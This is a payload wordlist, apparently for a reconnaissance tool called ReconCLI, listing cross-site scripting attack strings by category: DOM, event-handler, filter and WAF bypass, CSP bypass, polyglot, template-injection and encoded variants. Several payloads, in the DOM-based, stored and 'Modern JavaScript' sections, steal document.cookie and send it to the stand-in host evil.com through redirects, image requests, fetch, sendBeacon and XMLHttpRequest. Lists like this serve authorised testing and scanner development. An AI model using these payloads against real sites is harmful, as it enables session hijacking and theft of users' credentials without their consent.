# Advanced XSS Payloads for ReconCLI
# DOM-based XSS
<script>document.location='http://evil.com/'+document.cookie</script>
<img src=x onerror=document.location='http://evil.com/'+document.cookie>
<svg onload=document.location='http://evil.com/'+document.cookie>
javascript:document.location='http://evil.com/'+document.cookie

# Event Handler XSS
<body onload=alert('XSS')>
<input onfocus=alert('XSS') autofocus>
<select onfocus=alert('XSS') autofocus>
<textarea onfocus=alert('XSS') autofocus>
<keygen onfocus=alert('XSS') autofocus>
<video><source onerror="alert('XSS')">

# Filter Bypass
<script>eval(String.fromCharCode(97,108,101,114,116,40,39,88,83,83,39,41))</script>
<img src=x onerror=eval(String.fromCharCode(97,108,101,114,116,40,39,88,83,83,39,41))>
<iframe src=data:text/html,<script>alert('XSS')</script>>
<object data=data:text/html,<script>alert('XSS')</script>>

# Polyglot Payloads
jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert('XSS') )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert('XSS')//>\x3e
'">><marquee><img src=x onerror=confirm('XSS')></marquee>"></plaintext\></|\><plaintext/onmouseover=prompt('XSS')>
<svg/onload=alert('XSS')>

# WAF Bypass
<ScRiPt>alert('XSS')</ScRiPt>
<script>alert(String.fromCharCode(88,83,83))</script>
<img src="x" onerror="alert('XSS')">
<iframe src=javascript:alert('XSS')>
<embed src=javascript:alert('XSS')>
<object data=javascript:alert('XSS')>

# CSP Bypass
<script nonce="random">alert('XSS')</script>
<link rel=prefetch href="//evil.com">
<meta http-equiv="refresh" content="0;url=javascript:alert('XSS')">

# Reflected XSS in different contexts
';alert('XSS');//
";alert('XSS');//
</script><script>alert('XSS')</script>
'></script><script>alert('XSS')</script>
"><script>alert('XSS')</script>

# Stored XSS
<img src=x onerror=this.src='http://evil.com/?'+document.cookie>
<script>var i=new Image;i.src='http://evil.com/?'+document.cookie;</script>

# Modern JavaScript XSS
<script>fetch('http://evil.com',{method:'POST',body:document.cookie})</script>
<script>navigator.sendBeacon('http://evil.com',document.cookie)</script>
<script>new XMLHttpRequest().open('GET','http://evil.com/'+document.cookie,true).send()</script>

# Template Injection to XSS
{{7*7}}
${7*7}
#{7*7}
<%= 7*7 %>
{%raw%}{{7*7}}{%endraw%}

# File Upload XSS
GIF89a<script>alert('XSS')</script>
<!DOCTYPE html><html><head></head><body><script>alert('XSS')</script></body></html>

# Special Characters
<script>alert(/XSS/)</script>
<script>alert`XSS`</script>
<script>alert('XSS')</script>
<script>alert("XSS")</script>
<script>alert`XSS`</script>

# Unicode XSS
<script>\u0061lert('XSS')</script>
<script>\x61lert('XSS')</script>
<img src=x onerror=\u0061lert('XSS')>

# CSS-based XSS
<style>@import'javascript:alert("XSS")';</style>
<style>body{background:url("javascript:alert('XSS')")}</style>
<link rel=stylesheet href=javascript:alert('XSS')>

# XML/XSLT XSS
<xsl:value-of select="document('javascript:alert(1)')"/>
<?xml version="1.0"?><root xmlns:xsl="http://www.w3.org/1999/XSL/Transform"><xsl:template match="/"><script>alert('XSS')</script></xsl:template></root>

# Base64 Encoded
<iframe src="data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4=">
<object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4=">

# URL Encoded
%3Cscript%3Ealert('XSS')%3C/script%3E
%3Cimg%20src=x%20onerror=alert('XSS')%3E

# HTML Entity Encoded
&lt;script&gt;alert('XSS')&lt;/script&gt;
&#60;script&#62;alert('XSS')&#60;/script&#62;
